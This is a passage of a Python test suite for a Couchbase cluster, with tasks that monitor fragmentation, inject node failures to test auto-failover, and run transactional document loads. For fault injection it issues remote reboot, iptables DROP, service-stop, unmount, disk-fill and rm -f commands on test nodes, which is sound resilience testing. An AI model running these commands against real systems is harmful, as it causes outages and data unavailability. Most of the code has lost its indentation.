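def _example_monitor_view_compaction(server, task_manager):
    # Watch ns_server's _active_tasks for a view compaction of the
    # "_design/dev_view" design doc and wait for it to reach 100%
    # (or to disappear from the task list).
    monitor_task = MonitorActiveTask(server, "view_compaction",
                                     target_value="_design/dev_view",
                                     wait_progress=100,
                                     num_iterations=100,
                                     wait_task=True)
    task_manager.add_new_task(monitor_task)
    task_manager.get_task_result(monitor_task)
    return monitor_task.result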
class MonitorDBFragmentationTask(Task):
"""
Attempt to monitor fragmentation that is occurring for a given bucket.
Note: If autocompaction is enabled and user attempts to monitor for
fragmentation value higher than level at which auto_compaction
kicks in a warning is sent and it is best user to use lower value
as this can lead to infinite monitoring.
"""
def __init__(self, server, fragmentation_value=10, bucket_name="default",
get_view_frag=False):
Task.__init__(self, "monitor_frag_db_task_%s_%s"
% (bucket_name, time.time()))
self.server = server
self.bucket_name = bucket_name
self.fragmentation_value = fragmentation_value
self.get_view_frag = get_view_frag
def check(self):
# sanity check of fragmentation value
if self.fragmentation_value < 0 or self.fragmentation_value > 100:
err_msg = "Invalid value for fragmentation %d" \
% self.fragmentation_value
self.set_exception(Exception(err_msg))
def call(self):
self.check()
self.start_task()
bucket_helper = BucketHelper(self.server)
while True:
try:
stats = bucket_helper.fetch_bucket_stats(self.bucket_name)
if self.get_view_frag:
new_frag_value = \
stats["op"]["samples"]["couch_views_fragmentation"][-1]
self.test_log.debug(
"Current amount of views fragmentation %d"
% new_frag_value)
else:
new_frag_value = \
stats["op"]["samples"]["couch_docs_fragmentation"][-1]
self.test_log.debug(
"Current amount of docs fragmentation %d"
% new_frag_value)
if new_frag_value >= self.fragmentation_value:
self.test_log.info("Fragmentation level: %d%%"
% new_frag_value)
self.set_result(True)
break
except Exception as ex:
self.set_result(False)
self.set_exception(ex)
self.test_log.debug("Wait for expected fragmentation level")
sleep(2)
self.complete_task()
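# Illustrative usage sketch (not part of the original suite). `server` and
# `task_manager` are assumed to be a configured server object and an
# initialised task-manager instance, as used elsewhere in this file.
def _example_wait_for_doc_fragmentation(server, task_manager):
    # Block until the "default" bucket reports at least 50% document
    # fragmentation (see the note above about auto-compaction settings).
    frag_task = MonitorDBFragmentationTask(server,
                                           fragmentation_value=50,
                                           bucket_name="default",
                                           get_view_frag=False)
    task_manager.add_new_task(frag_task)
    task_manager.get_task_result(frag_task)
    return frag_task.result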
class AutoFailoverNodesFailureTask(Task):
def __init__(self, task_manager, master, servers_to_fail, failure_type,
timeout, pause=0, expect_auto_failover=True, timeout_buffer=3,
check_for_failover=True, failure_timers=None,
disk_timeout=0, disk_location=None, disk_size=200,
auto_reprovision=False):
super(AutoFailoverNodesFailureTask, self) \
.__init__("AutoFailoverNodesFailureTask")
self.task_manager = task_manager
self.master = master
self.servers_to_fail = servers_to_fail
self.num_servers_to_fail = self.servers_to_fail.__len__()
self.itr = 0
self.failure_type = failure_type
self.timeout = timeout
self.pause = pause
self.expect_auto_failover = expect_auto_failover
self.check_for_autofailover = check_for_failover
self.start_time = 0
self.timeout_buffer = timeout_buffer
self.current_failure_node = self.servers_to_fail[0]
self.max_time_to_wait_for_failover = self.timeout + \
self.timeout_buffer + 180
self.disk_timeout = disk_timeout
self.disk_location = disk_location
self.disk_size = disk_size
if failure_timers is None:
failure_timers = list()
self.failure_timers = failure_timers
self.rebalance_in_progress = False
self.auto_reprovision = auto_reprovision
def check_failure_timer_task_start(self, timer_task, retry_count=5):
while retry_count != 0 and not timer_task.started:
sleep(1, "Wait for failover timer to start", log_type="infra")
retry_count -= 1
if retry_count == 0:
self.task_manager.stop_task(timer_task)
self.set_exception("Node failure task failed to start")
return False
return True
def call(self):
self.start_task()
rest = RestConnection(self.master)
if rest._rebalance_progress_status() == "running":
self.rebalance_in_progress = True
return_val = False
while self.has_next() and not self.completed:
self.next()
if self.pause > 0 and self.pause > self.timeout:
return_val = self.check()
if self.pause == 0 or 0 < self.pause < self.timeout:
return_val = self.check()
self.complete_task()
return return_val
def check(self):
if not self.check_for_autofailover:
return True
rest = RestConnection(self.master)
max_timeout = self.timeout + self.timeout_buffer + self.disk_timeout
if self.start_time == 0:
message = "Did not inject failure in the system."
rest.print_UI_logs(10)
self.test_log.error(message)
self.set_exception(AutoFailoverException(message))
return False
if self.rebalance_in_progress:
status, stop_time = self._check_if_rebalance_in_progress(180)
if not status:
if stop_time == -1:
message = "Rebalance already completed before failover " \
"of node"
self.test_log.error(message)
self.set_exception(AutoFailoverException(message))
return False
elif stop_time == -2:
message = "Rebalance failed but no failed autofailover " \
"message was printed in logs"
self.test_log.warning(message)
else:
message = "Rebalance not failed even after 2 minutes " \
"after node failure."
self.test_log.error(message)
rest.print_UI_logs(10)
self.set_exception(AutoFailoverException(message))
return False
else:
self.start_time = stop_time
autofailover_initiated, time_taken = \
self._wait_for_autofailover_initiation(
self.max_time_to_wait_for_failover)
if self.expect_auto_failover and not self.auto_reprovision:
if autofailover_initiated:
if time_taken < max_timeout + 1:
self.test_log.debug("Autofailover of node {0} successfully"
" initiated in {1} sec"
.format(self.current_failure_node.ip,
time_taken))
rest.print_UI_logs(10)
return True
else:
message = "Autofailover of node {0} was initiated after " \
"the timeout period. Expected timeout: {1} " \
"Actual time taken: {2}".format(
self.current_failure_node.ip, self.timeout, time_taken)
self.test_log.error(message)
rest.print_UI_logs(10)
self.set_warn(AutoFailoverException(message))
return False
else:
message = "Autofailover of node {0} was not initiated after " \
"the expected timeout period of {1}".format(
self.current_failure_node.ip, self.timeout)
rest.print_UI_logs(10)
self.test_log.error(message)
self.set_warn(AutoFailoverException(message))
return False
else:
if autofailover_initiated:
message = "Node {0} was autofailed over but no autofailover " \
"of the node was expected" \
.format(self.current_failure_node.ip)
rest.print_UI_logs(10)
self.test_log.error(message)
if self.get_failover_count() == 1:
return True
self.set_exception(AutoFailoverException(message))
return False
elif self.expect_auto_failover:
self.test_log.error("Node not autofailed over as expected")
rest.print_UI_logs(10)
return False
def has_next(self):
return self.itr < self.num_servers_to_fail
def next(self):
if self.pause != 0:
self.test_log.debug("Wait before reset_auto_failover")
sleep(self.pause)
if self.pause > self.timeout and self.itr != 0:
rest = RestConnection(self.master)
status = rest.reset_autofailover()
self._rebalance()
if not status:
self.set_exception(Exception("Reset of autofailover "
"count failed"))
return False
self.current_failure_node = self.servers_to_fail[self.itr]
self.test_log.debug("Before failure time: {}"
.format(time.ctime(time.time())))
if self.failure_type == "enable_firewall":
self._enable_firewall(self.current_failure_node)
elif self.failure_type == "disable_firewall":
self._disable_firewall(self.current_failure_node)
elif self.failure_type == "restart_couchbase":
self._restart_couchbase_server(self.current_failure_node)
elif self.failure_type == "stop_couchbase":
self._stop_couchbase_server(self.current_failure_node)
elif self.failure_type == "start_couchbase":
self._start_couchbase_server(self.current_failure_node)
elif self.failure_type == "restart_network":
self._stop_restart_network(self.current_failure_node,
self.timeout + self.timeout_buffer + 30)
elif self.failure_type == "restart_machine":
self._restart_machine(self.current_failure_node)
elif self.failure_type == "stop_memcached":
self._stop_memcached(self.current_failure_node)
elif self.failure_type == "start_memcached":
self._start_memcached(self.current_failure_node)
elif self.failure_type == "network_split":
self._block_incoming_network_from_node(self.servers_to_fail[0],
self.servers_to_fail[
self.itr + 1])
self.itr += 1
elif self.failure_type == "disk_failure":
self._fail_disk(self.current_failure_node)
elif self.failure_type == "disk_full":
self._disk_full_failure(self.current_failure_node)
elif self.failure_type == "recover_disk_failure":
self._recover_disk(self.current_failure_node)
elif self.failure_type == "recover_disk_full_failure":
self._recover_disk_full_failure(self.current_failure_node)
self.test_log.debug("Start time = {}"
.format(time.ctime(self.start_time)))
self.itr += 1
def _enable_firewall(self, node):
node_failure_timer = self.failure_timers[self.itr]
self.task_manager.add_new_task(node_failure_timer)
self.check_failure_timer_task_start(node_failure_timer)
RemoteUtilHelper.enable_firewall(node)
self.test_log.debug("Enabled firewall on {}".format(node))
self.task_manager.get_task_result(node_failure_timer)
self.start_time = node_failure_timer.start_time
def _disable_firewall(self, node):
shell = RemoteMachineShellConnection(node)
shell.disable_firewall()
shell.disconnect()
def _restart_couchbase_server(self, node):
node_failure_timer = self.failure_timers[self.itr]
self.task_manager.add_new_task(node_failure_timer)
self.check_failure_timer_task_start(node_failure_timer)
shell = RemoteMachineShellConnection(node)
shell.restart_couchbase()
shell.disconnect()
self.test_log.debug("{0} - Restarted couchbase server".format(node))
self.task_manager.get_task_result(node_failure_timer)
self.start_time = node_failure_timer.start_time
def _stop_couchbase_server(self, node):
node_failure_timer = self.failure_timers[self.itr]
self.task_manager.add_new_task(node_failure_timer)
self.check_failure_timer_task_start(node_failure_timer)
shell = RemoteMachineShellConnection(node)
shell.stop_couchbase()
shell.disconnect()
self.test_log.debug("{0} - Stopped couchbase server".format(node))
self.task_manager.get_task_result(node_failure_timer)
self.start_time = node_failure_timer.start_time
def _start_couchbase_server(self, node):
shell = RemoteMachineShellConnection(node)
shell.start_couchbase()
shell.disconnect()
self.test_log.debug("{0} - Started couchbase server".format(node))
def _stop_restart_network(self, node, stop_time):
node_failure_timer = self.failure_timers[self.itr]
self.task_manager.add_new_task(node_failure_timer)
self.check_failure_timer_task_start(node_failure_timer)
shell = RemoteMachineShellConnection(node)
shell.stop_network(stop_time)
shell.disconnect()
self.test_log.debug("Stopped the network for {0} sec and restarted "
"the network on {1}".format(stop_time, node))
self.task_manager.get_task_result(node_failure_timer)
self.start_time = node_failure_timer.start_time
def _restart_machine(self, node):
node_failure_timer = self.failure_timers[self.itr]
self.task_manager.add_new_task(node_failure_timer)
self.check_failure_timer_task_start(node_failure_timer)
shell = RemoteMachineShellConnection(node)
command = "/sbin/reboot"
shell.execute_command(command=command)
shell.disconnect()
self.task_manager.get_task_result(node_failure_timer)
self.start_time = node_failure_timer.start_time
def _stop_memcached(self, node):
node_failure_timer = self.failure_timers[self.itr]
self.task_manager.add_new_task(node_failure_timer)
self.check_failure_timer_task_start(node_failure_timer)
shell = RemoteMachineShellConnection(node)
o, r = shell.stop_memcached()
self.test_log.debug("Killed memcached. {0} {1}".format(o, r))
shell.disconnect()
self.task_manager.get_task_result(node_failure_timer)
self.start_time = node_failure_timer.start_time
def _start_memcached(self, node):
shell = RemoteMachineShellConnection(node)
o, r = shell.start_memcached()
self.test_log.debug("Started back memcached. {0} {1}".format(o, r))
shell.disconnect()
def _block_incoming_network_from_node(self, node1, node2):
shell = RemoteMachineShellConnection(node1)
self.test_log.debug("Adding {0} into iptables rules on {1}"
.format(node1.ip, node2.ip))
command = "iptables -A INPUT -s {0} -j DROP".format(node2.ip)
shell.execute_command(command)
shell.disconnect()
self.start_time = time.time()
def _fail_disk(self, node):
shell = RemoteMachineShellConnection(node)
output, error = shell.unmount_partition(self.disk_location)
success = True
if output:
for line in output:
if self.disk_location in line:
success = False
if success:
self.test_log.debug("Unmounted disk at location : {0} on {1}"
.format(self.disk_location, node.ip))
self.start_time = time.time()
else:
exception_str = "Could not fail the disk at {0} on {1}" \
.format(self.disk_location, node.ip)
self.test_log.error(exception_str)
self.set_exception(Exception(exception_str))
shell.disconnect()
    def _recover_disk(self, node):
        shell = RemoteMachineShellConnection(node)
        o, r = shell.mount_partition(self.disk_location)
        for line in o:
            if self.disk_location in line:
                self.test_log.debug("Mounted disk at location {0} on {1}"
                                    .format(self.disk_location, node.ip))
                shell.disconnect()
                return
        shell.disconnect()
        exception_str = "Failed to mount disk at location {0} on {1}" \
            .format(self.disk_location, node.ip)
        self.set_exception(Exception(exception_str))
        raise Exception(exception_str)
def _disk_full_failure(self, node):
shell = RemoteMachineShellConnection(node)
output, error = shell.fill_disk_space(self.disk_location,
self.disk_size)
success = False
if output:
for line in output:
if self.disk_location in line:
if "0 100% {0}".format(self.disk_location) in line:
success = True
if success:
self.test_log.debug("Filled up disk Space at {0} on {1}"
.format(self.disk_location, node.ip))
self.start_time = time.time()
else:
self.test_log.debug("Could not fill the disk at {0} on {1}"
.format(self.disk_location, node.ip))
self.set_exception(Exception("Failed to fill disk at {0} on {1}"
.format(self.disk_location, node.ip)))
shell.disconnect()
def _recover_disk_full_failure(self, node):
shell = RemoteMachineShellConnection(node)
delete_file = "{0}/disk-quota.ext3".format(self.disk_location)
output, error = shell.execute_command("rm -f {0}".format(delete_file))
self.test_log.debug(output)
if error:
self.test_log.error(error)
shell.disconnect()
def _check_for_autofailover_initiation(self, failed_over_node):
rest = RestConnection(self.master)
ui_logs = rest.get_logs(20)
ui_logs_text = [t["text"] for t in ui_logs]
ui_logs_time = [t["serverTime"] for t in ui_logs]
if self.auto_reprovision:
expected_log = "has been reprovisioned on following nodes: ['ns_1@{}']".format(
failed_over_node.ip)
else:
expected_log = "Starting failing over ['ns_1@{}']".format(
failed_over_node.ip)
if expected_log in ui_logs_text:
failed_over_time = ui_logs_time[ui_logs_text.index(expected_log)]
return True, failed_over_time
return False, None
def get_failover_count(self):
rest = RestConnection(self.master)
cluster_status = rest.cluster_status()
failover_count = 0
# check for inactiveFailed
for node in cluster_status['nodes']:
if node['clusterMembership'] == "inactiveFailed":
failover_count += 1
return failover_count
    def _wait_for_autofailover_initiation(self, timeout):
        autofailover_initiated = False
        while time.time() < timeout + self.start_time:
            autofailover_initiated, failed_over_time = \
                self._check_for_autofailover_initiation(
                    self.current_failure_node)
            if autofailover_initiated:
                end_time = self._get_mktime_from_server_time(failed_over_time)
                time_taken = end_time - self.start_time
                return autofailover_initiated, time_taken
        return autofailover_initiated, -1
def _get_mktime_from_server_time(self, server_time):
time_format = "%Y-%m-%dT%H:%M:%S"
server_time = server_time.split('.')[0]
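        # e.g. a serverTime such as "2021-03-09T11:22:33.456Z" becomes
        # "2021-03-09T11:22:33" after dropping the fractional part, and is
        # then parsed with the format above.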
mk_time = time.mktime(time.strptime(server_time, time_format))
return mk_time
def _rebalance(self):
rest = RestConnection(self.master)
nodes = rest.node_statuses()
rest.rebalance(otpNodes=[node.id for node in nodes])
rebalance_progress = rest.monitorRebalance()
if not rebalance_progress:
self.set_result(False)
self.set_exception(Exception("Failed to rebalance after failover"))
def _check_if_rebalance_in_progress(self, timeout):
rest = RestConnection(self.master)
end_time = time.time() + timeout
while time.time() < end_time:
try:
rebalance_status, progress = \
rest._rebalance_status_and_progress()
if rebalance_status == "running":
continue
elif rebalance_status is None and progress == 100:
return False, -1
except RebalanceFailedException:
ui_logs = rest.get_logs(10)
ui_logs_text = [t["text"] for t in ui_logs]
ui_logs_time = [t["serverTime"] for t in ui_logs]
                rebalance_failure_log = "Rebalance exited with reason"
                for ui_log in ui_logs_text:
                    if rebalance_failure_log in ui_log:
rebalance_failure_time = ui_logs_time[
ui_logs_text.index(ui_log)]
failover_log = "Could not automatically fail over " \
"node ('ns_1@{}'). Rebalance is " \
"running.".format(
self.current_failure_node.ip)
if failover_log in ui_logs_text:
return True, self._get_mktime_from_server_time(
rebalance_failure_time)
else:
return False, -2
return False, -3
class NodeDownTimerTask(Task):
def __init__(self, node, port=None, timeout=300):
Task.__init__(self, "NodeDownTimerTask")
self.test_log.debug("Initializing NodeDownTimerTask")
self.node = node
self.port = port
self.timeout = timeout
self.start_time = 0
def call(self):
self.start_task()
self.test_log.debug("Starting execution of NodeDownTimerTask")
end_task = time.time() + self.timeout
while not self.completed and time.time() < end_task:
if not self.port:
try:
self.start_time = time.time()
response = os.system("ping -c 1 {} > /dev/null".format(
self.node))
if response != 0:
self.test_log.debug(
"Injected failure in {}. Caught due to ping"
.format(self.node))
self.complete_task()
self.set_result(True)
break
except Exception as e:
self.test_log.warning("Unexpected exception: %s" % e)
self.complete_task()
return True
try:
self.start_time = time.time()
socket.socket().connect(("%s" % self.node,
constants.port))
socket.socket().close()
socket.socket().connect(("%s" % self.node,
constants.memcached_port))
socket.socket().close()
except socket.error:
self.test_log.debug(
"Injected failure in %s. Caught due to ports"
% self.node)
self.complete_task()
return True
else:
try:
self.start_time = time.time()
socket.socket().connect(("%s" % self.node,
int(self.port)))
socket.socket().close()
socket.socket().connect(("%s" % self.node,
constants.memcached_port))
socket.socket().close()
except socket.error:
self.test_log.debug("Injected failure in %s" % self.node)
self.complete_task()
return True
if time.time() >= end_task:
self.complete_task()
self.test_log.error("Could not inject failure in %s" % self.node)
return False
class Atomicity(Task):
instances = 1
num_items = 110
mutations = num_items
start_from = 0
op_type = "insert"
persist_to = 1
replicate_to = 1
task_manager = list()
write_offset = list()
def __init__(self, cluster, task_manager, bucket, clients,
generator, op_type, exp, flag=0,
persist_to=0, replicate_to=0, time_unit="seconds",
batch_size=1,
timeout_secs=5, compression=None,
process_concurrency=8, print_ops_rate=True, retries=5,
update_count=1, transaction_timeout=5,
commit=True, durability=None, sync=True, num_threads=5,
record_fail=False, defer=False):
super(Atomicity, self).__init__("AtomicityDocLoadTask_%s_%s_%s_%s"
% (op_type, generator[0].start,
generator[0].end, time.time()))
self.generators = generator
self.cluster = cluster
self.commit = commit
self.record_fail = record_fail
self.defer = defer
self.num_docs = num_threads
self.exp = exp
self.flag = flag
self.sync = sync
self.persist_to = persist_to
self.replicate_to = replicate_to
self.time_unit = time_unit
self.timeout_secs = timeout_secs
self.transaction_timeout = transaction_timeout
self.compression = compression
self.process_concurrency = process_concurrency
self.task_manager = task_manager
self.batch_size = batch_size
self.print_ops_rate = print_ops_rate
self.op_type = op_type
self.bucket = bucket
self.clients = clients
self.gen = list()
self.retries = retries
self.update_count = update_count
self.transaction_app = Transaction()
self.transaction = None
if durability == Bucket.DurabilityLevel.MAJORITY:
self.durability = 1
elif durability == \
Bucket.DurabilityLevel.MAJORITY_AND_PERSIST_TO_ACTIVE:
self.durability = 2
elif durability == Bucket.DurabilityLevel.PERSIST_TO_MAJORITY:
self.durability = 3
elif durability == "ONLY_NONE":
self.durability = 4
else:
self.durability = 0
sleep(10, "Wait before txn load")
def call(self):
tasks = list()
exception_seen = None
self.start_task()
if self.op_type == "time_out":
transaction_config = self.transaction_app.createTransactionConfig(
2, self.durability)
else:
self.test_log.info("Transaction timeout: %s"
% self.transaction_timeout)
transaction_config = self.transaction_app.createTransactionConfig(
self.transaction_timeout, self.durability)
try:
self.transaction = self.transaction_app.createTansaction(
self.clients[0][0].cluster, transaction_config)
self.test_log.info("Transaction: %s" % self.transaction)
except Exception as e:
self.set_exception(e)
for generator in self.generators:
tasks.extend(self.get_tasks(generator))
self.test_log.debug("Adding new tasks")
for task in tasks:
self.task_manager.add_new_task(task)
for task in tasks:
self.task_manager.get_task_result(task)
if task.exception is not None:
exception_seen = task.exception
self.transaction.close()
for con in self.clients:
for client in con:
client.close()
self.complete_task()
if exception_seen:
self.set_exception(exception_seen)
def get_tasks(self, generator):
generators = []
tasks = []
gen_start = int(generator.start)
gen_end = int(generator.end)
gen_range = max(
int((generator.end - generator.start) / self.process_concurrency),
1)
for pos in range(gen_start, gen_end, gen_range):
partition_gen = copy.deepcopy(generator)
partition_gen.start = pos
partition_gen.itr = pos
partition_gen.end = pos + gen_range
if partition_gen.end > generator.end:
partition_gen.end = generator.end
batch_gen = BatchedDocumentGenerator(
partition_gen,
self.batch_size)
generators.append(batch_gen)
for i in range(0, len(generators)):
task = self.Loader(self.cluster, self.bucket[i], self.clients,
generators[i], self.op_type,
self.exp, self.num_docs, self.update_count,
self.defer, self.sync, self.record_fail,
flag=self.flag,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
time_unit=self.time_unit,
batch_size=self.batch_size,
timeout_secs=self.timeout_secs,
compression=self.compression,
instance_num=1,
transaction_app=self.transaction_app,
transaction=self.transaction,
commit=self.commit,
retries=self.retries)
tasks.append(task)
return tasks
class Loader(GenericLoadingTask):
"""
1. Start inserting data into buckets
2. Keep updating the write offset
3. Start the reader thread
4. Keep track of non durable documents
"""
def __init__(self, cluster, bucket, clients,
generator, op_type, exp,
num_docs, update_count, defer, sync, record_fail,
flag=0, persist_to=0, replicate_to=0, time_unit="seconds",
batch_size=1, timeout_secs=5,
compression=None, retries=5, instance_num=0,
transaction_app=None, transaction=None, commit=True,
sdk_client_pool=None,
scope=CbServer.default_scope,
collection=CbServer.default_collection):
super(Atomicity.Loader, self).__init__(
cluster, bucket, clients[0][0],
batch_size=batch_size,
timeout_secs=timeout_secs, compression=compression,
retries=retries,
sdk_client_pool=sdk_client_pool,
scope=scope, collection=collection)
self.generator = generator
self.op_type = op_type.split(';')
self.thread_name = "Atomicity_Loader-%s_%s_%s_%s_%s" \
% (op_type, bucket,
generator._doc_gen.start,
generator._doc_gen.end,
time.time())
self.exp = exp
self.flag = flag
self.persist_to = persist_to
self.replicate_to = replicate_to
self.compression = compression
self.timeout_secs = timeout_secs
self.time_unit = time_unit
self.instance = instance_num
self.transaction_app = transaction_app
self.transaction = transaction
self.commit = commit
self.defer = defer
self.clients = clients
self.bucket = bucket
self.exp_unit = "seconds"
self.retries = retries
self.key_value_list = list()
self.exception = None
self.num_docs = num_docs
self.update_count = update_count
self.sync = sync
self.record_fail = record_fail
if self.op_type[-1] == "delete":
self.suppress_error_table = True
def has_next(self):
return self.generator.has_next()
def call(self):
self.start_task()
self.test_log.info("Starting Atomicity load generation thread")
self.all_keys = list()
self.update_keys = list()
self.delete_keys = list()
docs = list()
exception = None
doc_gen = self.generator
while self.has_next():
self.batch = doc_gen.next_batch()
self.key_value_list.extend(self.batch)
for tuple in self.key_value_list:
docs.append(tuple)
last_batch = dict(self.key_value_list[-10:])
self.all_keys = dict(self.key_value_list).keys()
self.list_docs = list(self.__chunks(self.all_keys,
self.num_docs))
self.docs = list(self.__chunks(self.key_value_list, self.num_docs))
for op_type in self.op_type:
self.encoding = list()
if op_type == 'general_create':
for client in self.clients[0]:
self.batch_create(
self.key_value_list, client,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
doc_type=self.generator.doc_type)
elif op_type == "create":
if len(self.op_type) != 1:
commit = True
else:
commit = self.commit
for self.doc in self.docs:
self.transaction_load(self.doc, commit,
op_type="create")
if not commit:
self.all_keys = []
elif op_type in ["update", "rebalance_only_update"]:
for doc in self.list_docs:
self.transaction_load(doc, self.commit,
op_type="update")
if self.commit:
self.update_keys = self.all_keys
elif op_type == "update_Rollback":
exception = self.transaction_app.RunTransaction(
self.clients[0][0].cluster,
self.transaction, self.bucket, [], self.update_keys,
[], False, True, self.update_count)
elif op_type == "delete" or op_type == "rebalance_delete":
for doc in self.list_docs:
self.transaction_load(doc, self.commit,
op_type="delete")
if self.commit:
self.delete_keys = self.all_keys
elif op_type == "general_update":
for client in self.clients[0]:
self.batch_update(self.batch, client,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
doc_type=self.generator.doc_type)
elif op_type == "general_delete":
self.test_log.debug("Performing delete for keys %s"
% last_batch.keys())
for client in self.clients[0]:
_ = self.batch_delete(
self.batch, client,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability="")
self.delete_keys = last_batch.keys()
elif op_type in ["rebalance_update", "create_update"]:
for i in range(len(self.docs)):
self.transaction_load(self.docs[i], self.commit,
self.list_docs[i],
op_type="create")
if self.commit:
self.update_keys = self.all_keys
elif op_type == "time_out":
err = self.transaction_app.RunTransaction(
self.clients[0][0].cluster,
self.transaction, self.bucket, docs, [], [],
True, True, self.update_count)
if "AttemptExpired" in str(err):
self.test_log.info("Transaction Expired as Expected")
for line in err:
self.test_log.info("%s" % line)
                        self.test_log.debug(
                            "End of the first transaction that timed out")
else:
exception = err
# self.test_log.warning("Wait for txn to clean up")
# time.sleep(60)
if self.defer:
self.test_log.info("Commit/rollback deffered transaction")
self.retries = 5
if op_type != "create":
commit = self.commit
for encoded in self.encoding:
err = self.transaction_app.DefferedTransaction(
self.clients[0][0].cluster,
self.transaction, commit, encoded)
if err:
while self.retries > 0:
if SDKException.DurabilityImpossibleException \
in str(err):
self.retries -= 1
self.test_log.info(
"Retrying due to D_Impossible seen during deferred-transaction")
# sleep(60)
err = self.transaction_app.DefferedTransaction(
self.clients[0][0].cluster,
self.transaction, self.commit, encoded)
if err:
continue
break
else:
exception = err
break
if exception:
if self.record_fail:
self.all_keys = list()
else:
self.exception = Exception(exception)
break
self.test_log.info("Atomicity Load generation thread completed")
self.inserted_keys = dict()
for client in self.clients[0]:
self.inserted_keys[client] = []
self.inserted_keys[client].extend(self.all_keys)
self.test_log.info("Starting Atomicity Verification thread")
self.process_values_for_verification(self.key_value_list)
for client in self.clients[0]:
result_map = self.batch_read(self.all_keys, client)
wrong_values = self.validate_key_val(result_map[0],
self.key_value_list,
client)
if wrong_values:
self.exception = "Wrong key value: %s" \
% ','.join(wrong_values)
for key in self.delete_keys:
if key in self.inserted_keys[client]:
self.inserted_keys[client].remove(key)
if self.inserted_keys[client] \
and "time_out" not in self.op_type:
self.exception = "Keys missing: %s" \
% (','.join(self.inserted_keys[client]))
self.test_log.info("Completed Atomicity Verification thread")
self.complete_task()
def transaction_load(self, doc, commit=True, update_keys=[],
op_type="create"):
err = None
if self.defer:
if op_type == "create":
ret = self.transaction_app.DeferTransaction(
self.clients[0][0].cluster,
self.transaction, self.bucket, doc, update_keys, [])
elif op_type == "update":
ret = self.transaction_app.DeferTransaction(
self.clients[0][0].cluster,
self.transaction, self.bucket, [], doc, [])
elif op_type == "delete":
ret = self.transaction_app.DeferTransaction(
self.clients[0][0].cluster,
self.transaction, self.bucket, [], [], doc)
err = ret.getT2()
else:
if op_type == "create":
err = self.transaction_app.RunTransaction(
self.clients[0][0].cluster,
self.transaction, self.bucket, doc, update_keys, [],
commit, self.sync, self.update_count)
elif op_type == "update":
err = self.transaction_app.RunTransaction(
self.clients[0][0].cluster,
self.transaction, self.bucket, [], doc, [],
commit, self.sync, self.update_count)
elif op_type == "delete":
err = self.transaction_app.RunTransaction(
self.clients[0][0].cluster,
self.transaction, self.bucket, [], [], doc,
commit, self.sync, self.update_count)
if err:
if self.record_fail:
self.all_keys = list()
elif SDKException.DurabilityImpossibleException in str(err) \
and self.retries > 0:
self.test_log.info("D_ImpossibleException so retrying..")
# sleep(60)
self.retries -= 1
self.transaction_load(doc, commit, update_keys, op_type)
# else:
# exception = err
elif self.defer:
self.encoding.append(ret.getT1())
def __chunks(self, l, n):
"""Yield successive n-sized chunks from l."""
for i in range(0, len(l), n):
yield l[i:i + n]
def validate_key_val(self, map, key_value, client):
wrong_values = []
for item in key_value:
key = item.getT1()
value = item.getT2()
if key in map:
if self.op_type == "time_out":
expected_val = {}
else:
expected_val = Json.loads(value.toString())
actual_val = {}
if map[key]['cas'] != 0:
actual_val = Json.loads(map[key]['value'].toString())
elif map[key]['error'] is not None:
actual_val = map[key]['error'].toString()
if expected_val == actual_val or map[key]['cas'] == 0:
try:
self.inserted_keys[client].remove(key)
except:
pass
else:
wrong_values.append(key)
self.test_log.info("Key %s - Actual value %s,"
"Expected value: %s"
% (key, actual_val, expected_val))
return wrong_values
def process_values_for_verification(self, key_val):
for item in key_val:
key = item.getT1()
if key in self.update_keys or self.op_type == "verify":
try:
                        # New updated value; note this is not present in the
                        # original "LoadDocumentsTask" code
value = item.getT2()
value.put('mutated', self.update_count)
except ValueError:
pass
finally:
key_val.remove(item)
item = Tuples.of(key, value)
key_val.append(item)
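# Minimal sketch (not part of the original suite) of the chunking performed by
# Atomicity.Loader.__chunks above: a key list is split into successive n-sized
# slices so that each transaction call handles at most n documents.
def _example_chunks(items, n):
    return [items[i:i + n] for i in range(0, len(items), n)]
# e.g. _example_chunks([1, 2, 3, 4, 5, 6, 7], 3) -> [[1, 2, 3], [4, 5, 6], [7]]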
class MonitorViewFragmentationTask(Task):
"""
Attempt to monitor fragmentation that is occurring for a given design_doc.
execute stage is just for preliminary sanity checking of values and environment.
Check function looks at index file accross all nodes and attempts to calculate
total fragmentation occurring by the views within the design_doc.
Note: If autocompaction is enabled and user attempts to monitor for fragmentation
value higher than level at which auto_compaction kicks in a warning is sent and
it is best user to use lower value as this can lead to infinite monitoring.
"""
def __init__(self, server, design_doc_name, fragmentation_value=10,
bucket="default"):
Task.__init__(self, "monitor_frag_task")
self.server = server
self.bucket = bucket
self.fragmentation_value = fragmentation_value
self.design_doc_name = design_doc_name
self.result = False
def call(self):
self.start_task()
# sanity check of fragmentation value
if self.fragmentation_value < 0 or self.fragmentation_value > 100:
err_msg = "Invalid value for fragmentation %d" % self.fragmentation_value
self.set_exception(Exception(err_msg))
try:
auto_compact_percentage = self._get_current_auto_compaction_percentage()
if auto_compact_percentage != "undefined" \
and auto_compact_percentage < self.fragmentation_value:
self.test_log.warn(
"Auto compaction is set to %s. "
"Therefore fragmentation_value %s may not be reached"
% (auto_compact_percentage, self.fragmentation_value))
except GetBucketInfoFailed as e:
self.set_exception(e)
except Exception as e:
self.set_exception(e)
self.check()
self.complete_task()
def _get_current_auto_compaction_percentage(self):
""" check at bucket level and cluster level for compaction percentage """
auto_compact_percentage = None
rest = BucketHelper(self.server)
content = rest.get_bucket_json(self.bucket)
if content["autoCompactionSettings"] is False:
# try to read cluster level compaction settings
content = rest.cluster_status()
auto_compact_percentage = \
content["autoCompactionSettings"]["viewFragmentationThreshold"][
"percentage"]
return auto_compact_percentage
def check(self):
rest = RestConnection(self.server)
new_frag_value = 0
timeout = 300
        while new_frag_value < self.fragmentation_value and timeout > 0:
            new_frag_value = MonitorViewFragmentationTask.calc_ddoc_fragmentation(
                rest, self.design_doc_name, bucket=self.bucket)
            self.test_log.info("%s: current fragmentation = %d %%, "
                               "required: %d %%"
                               % (self.design_doc_name,
                                  new_frag_value,
                                  self.fragmentation_value))
            if new_frag_value >= self.fragmentation_value:
                self.result = True
                break
            timeout -= 1
            sleep(1, "Wait for fragmentation level to be reached",
                  log_type="infra")
@staticmethod
def aggregate_ddoc_info(rest, design_doc_name, bucket="default",
with_rebalance=False):
infra_log = logger.get("infra")
nodes = rest.node_statuses()
info = []
for node in nodes:
server_info = {"ip": node.ip,
"port": node.port,
"username": rest.username,
"password": rest.password}
